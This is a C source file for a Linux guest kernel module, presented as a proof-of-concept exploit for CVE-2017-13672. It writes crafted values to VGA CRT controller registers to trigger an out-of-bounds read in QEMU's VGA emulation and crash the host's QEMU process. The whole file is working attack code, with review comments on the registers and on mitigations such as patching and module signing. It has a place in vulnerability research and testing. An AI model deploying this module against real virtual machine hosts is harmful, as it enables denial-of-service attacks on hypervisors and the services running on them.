CVE-2017-13672/linux-module/CVE-2017-13672.c
| #define LINUX | |
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/init.h> | |
| #include <asm/io.h> | |
/*
 * Proof-of-concept guest kernel module for CVE-2017-13672.
 *
 * Per the public CVE record this is an out-of-bounds read in QEMU's VGA
 * display emulation that a privileged guest user can turn into a crash of
 * the QEMU process (denial of service). Loading a module needs
 * CAP_SYS_MODULE in the guest, which matches that precondition; a patched
 * QEMU on the host and module-signature enforcement in the guest are the
 * relevant mitigations.
 */
#define DRIVER_AUTHOR	"David Buchanan"
#define DRIVER_DESC	"CVE-2017-13672 POC"

/* Legacy VGA CRT controller I/O ports (from qemu/hw/display/vga_regs.h). */
#define VGA_CRT_IC	0x3D4	/* CRT Controller Index - color emulation */
#define VGA_CRT_DC	0x3D5	/* CRT Controller Data Register - color emulation */

/* CRTC register indices (from the CL-GD5446 Technical Reference Manual). */
#define VGA_CRC		0x0C	/* CRTC Screen Start Address High Register */
#define VGA_CRD		0x0D	/* CRTC Screen Start Address Low Register */
#define VGA_CR1B	0x1B	/* Extended Display Controls Register */
#define VGA_CR1D	0x1D	/* Overlay Extended Control Register */

/*
 * Saved copies of the four CRTC registers, filled in by init_module() and
 * written back by cleanup_module().
 * NOTE(review): these have external linkage; nothing visible in this file
 * needs that, so `static` would be the conventional choice.
 */
unsigned char crc_bak;
unsigned char crd_bak;
unsigned char cr1b_bak;
unsigned char cr1d_bak;
/*
 * Read one CRT controller register.
 *
 * The CRTC is reached through an index/data port pair: the register number
 * is written to VGA_CRT_IC, then the value is read from VGA_CRT_DC.
 *
 * @reg: CRTC register index to read.
 * Returns the byte read from the data port.
 *
 * NOTE(review): the select and the read are two separate port accesses and
 * no lock is taken here, so another user of the same ports (for example a
 * console driver) could presumably interleave between them - confirm.
 */
unsigned char vga_crt_read(unsigned char reg)
{
	unsigned char value;

	outb_p(reg, VGA_CRT_IC);	/* select the register */
	value = inb_p(VGA_CRT_DC);	/* fetch its current contents */

	return value;
}
/*
 * Write one CRT controller register.
 *
 * Selects the register by writing its index to VGA_CRT_IC, then stores the
 * new value through VGA_CRT_DC.
 *
 * @val: byte to store.
 * @reg: CRTC register index to write.
 *
 * Note the argument order: value first, register second.
 * NOTE(review): as with vga_crt_read(), the two port writes are not
 * protected by any lock visible in this file.
 */
void vga_crt_write(unsigned char val, unsigned char reg)
{
	outb_p(reg, VGA_CRT_IC);	/* select the register */
	outb_p(val, VGA_CRT_DC);	/* store the new contents */
}
/*
 * Module entry point: runs once when the module is loaded.
 *
 * Saves the current values of CRTC registers 0x0C, 0x0D, 0x1B and 0x1D into
 * the *_bak globals, then rewrites them: 0xFF into both screen start
 * address registers, and extra bits OR'ed into CR1B (0x0D) and CR1D (0x80).
 *
 * NOTE(review): the OR'ed bits are presumably the extended screen start
 * address bits of the Cirrus CRTC, i.e. the display start address is pushed
 * to its maximum - confirm against the CL-GD5446 manual.
 *
 * The ports are written unconditionally; nothing here probes which VGA
 * device is behind them. The KERN_ALERT line below is written to the guest
 * kernel log before any register is touched, which makes it a usable
 * guest-side indicator.
 *
 * Returns 0, so the load succeeds and cleanup_module() can later restore
 * the saved values.
 */
int init_module(void)
{
	unsigned char cr1b_new;
	unsigned char cr1d_new;

	printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");

	/* Snapshot the registers so they can be restored on unload. */
	crc_bak = vga_crt_read(VGA_CRC);
	crd_bak = vga_crt_read(VGA_CRD);
	cr1b_bak = vga_crt_read(VGA_CR1B);
	cr1d_bak = vga_crt_read(VGA_CR1D);

	/* Keep the bits already set in the extended registers, add the new ones. */
	cr1b_new = cr1b_bak | 0x0D;
	cr1d_new = cr1d_bak | 0x80;

	/* Same write order as the original: start address high/low, CR1B, CR1D. */
	vga_crt_write(0xFF, VGA_CRC);
	vga_crt_write(0xFF, VGA_CRD);
	vga_crt_write(cr1b_new, VGA_CR1B);
	vga_crt_write(cr1d_new, VGA_CR1D); // usually only this bit needs to be set

	return 0;
}
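/*
 * Module exit point: runs when the module is unloaded.
 *
 * Writes the four CRTC values saved by init_module() back to their
 * registers, in the same order they were modified. This is best effort:
 * the log message itself says the display may not recover.
 *
 * Reaching this function means the guest kernel is still running, which the
 * message reports as an unsuccessful attempt.
 */
void cleanup_module(void)
{
	/*
	 * Explicit log level, matching init_module(); a printk() without one
	 * falls back to the kernel's default message level.
	 */
	printk(KERN_ALERT "If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");

	vga_crt_write(crc_bak, VGA_CRC);
	vga_crt_write(crd_bak, VGA_CRD);
	vga_crt_write(cr1b_bak, VGA_CR1B);
	vga_crt_write(cr1d_bak, VGA_CR1D);
}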
/*
 * Module metadata. The description expands to DRIVER_DESC, so the CVE
 * identifier appears in the built module's description field.
 */
MODULE_LICENSE("Dual MIT/GPL");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);